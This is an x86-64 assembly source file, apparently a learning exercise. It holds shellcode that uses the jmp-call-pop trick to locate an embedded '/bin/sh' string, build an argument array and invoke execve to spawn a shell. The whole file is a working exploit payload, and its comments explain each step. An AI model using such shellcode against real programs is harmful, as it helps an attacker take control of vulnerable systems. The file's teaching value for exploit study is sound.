global _start 

section .text

_start:

	jmp find_address

shellcode:
	xor rax, rax

	; Get the address of the string 
	pop rdi

	; Convert the A -> 0x0 to null terminate the string 
	mov [rdi +7], byte ah

	; Copy the address of the string in RDI to BBBBBBBB
	mov [rdi +8], rdi

	; copy the NULL 0x0000000000000000 -> CCCCCCCC

	mov [rdi +16], rax

	; Setup the addresses

	lea rsi, [rdi +8]
	lea rdx, [rdi +16]

	add rax, 59
	syscall


find_address:
	call shellcode

shell_path_string:	db	"/bin/shABBBBBBBBCCCCCCCC"